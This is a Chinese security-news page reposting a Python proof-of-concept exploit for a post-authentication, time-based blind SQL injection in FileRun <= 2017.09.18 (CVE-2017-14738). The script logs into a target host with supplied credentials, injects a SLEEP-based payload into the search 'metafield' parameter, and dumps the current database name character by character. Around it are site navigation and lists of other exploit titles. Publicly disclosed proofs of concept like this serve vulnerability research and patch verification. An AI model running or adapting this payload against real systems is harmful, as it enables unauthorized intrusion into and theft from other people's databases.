首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FileRun < 2017.09.18 - SQL Injection
来源:research[at]spentera.id 作者:SPARC 发布时间:2017-10-10  
#!/usr/bin/env python
# Exploit Title: FileRun <=2017.09.18
# Date: September 29, 2017
# Exploit Author: SPARC
# Vendor Homepage: https://www.filerun.com/
# Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2017.09.18
# Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0
# CVE : CVE-2017-14738
#
 
import sys,time,urllib,urllib2,cookielib
from time import sleep
 
print """
#===============================================================#
|                                                               |
|            ___|                   |                           |
|          \___ \  __ \   _ \ __ \  __|  _ \  __| _` |          |
|                | |   |  __/ |   | |    __/ |   (   |          |
|          _____/  .__/ \___|_|  _|\__|\___|_|  \__,_|          |
|                 _|                                            |
|                                                               |
|                   FileRun <= 2017.09.18                       |
|       BlindSQLi Proof of Concept (Post Authentication)        |         
|        by Spentera Research (research[at]spentera.id)         |
|                                                               |
#===============================================================#
"""
 
 
host = raw_input("[*] Target IP: ")
username = raw_input("[*] Username: ")
password = raw_input("[*] Password: ")
target = 'http://%s/?module=search&section=ajax&page=grid' %(host)
delay=1
global cookie,data
 
 
 
def masuk(usr,pswd):
    log_data = {
        'username': usr,
        'password': pswd
    }
 
    post_data = urllib.urlencode(log_data)
    cookjar = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar))
    try:   
        req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data)
        content = opener.open(req)
        global data,cookie
        data = dict((cookie.name, cookie.value) for cookie in cookjar)
        cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID']))
        return str(content.read())
    except:                                            
        print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL'              
        sys.exit(0)
 
def konek(m,n):
    #borrow from SQLmap :)
    query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n))
    values = { 'metafield': query,            
               'searchType': 'meta',
               'keyword': 'work',
               'searchPath': '/ROOT/HOME',
               'path': '/ROOT/SEARCH' }
     
    req = urllib2.Request(target, urllib.urlencode(values))                        
    req.add_header('Cookie', cookie) 
    try:                                       
            starttime=time.time()
            response =  urllib2.urlopen(req)
            endtime = time.time()
            return int(endtime-starttime)
 
    except:                                            
            print '\n[-] Uh oh! Exploit fail..'              
            sys.exit(0)
 
print "[+] Logging in to the application..."
sleep(1)
cekmasuk = masuk(username,password)
if u'success' in cekmasuk:
    print "[*] Using Time-Based method with %ds delay."%int(delay)
    print "[+] Starting to dump current database. This might take time.."
    sys.stdout.write('[+] Target current database is: ')
    sys.stdout.flush()
 
    starttime = time.time()
    for m in range(1,256):
        for n in range(32,126):
            wkttunggu = konek(m,n)     
            if (wkttunggu < delay):             
                sys.stdout.write(chr(n))
                sys.stdout.flush()
                break
    endtime = time.time()
    print "\n[+] Done in %d seconds" %int(endtime-starttime)
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Dup Scout Enterprise 10.0.18 -
·Sync Breeze Enterprise 10.0.28
·Trend Micro OfficeScan 11.0/XG
·Microsoft Word 2007 (x86) - In
·DiskBoss Enterprise 8.4.16 - '
·Linux Kernel < 4.14.rc3 - Loca
·DiskBoss Enterprise 8.4.16 - L
·Qmail SMTP - Bash Environment
·Cisco Prime Collaboration Prov
·Dnsmasq < 2.78 - 2-byte Heap-B
·LAquis SCADA 4.1.0.2385 - Dire
·Dnsmasq < 2.78 - Heap-Based Ov
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved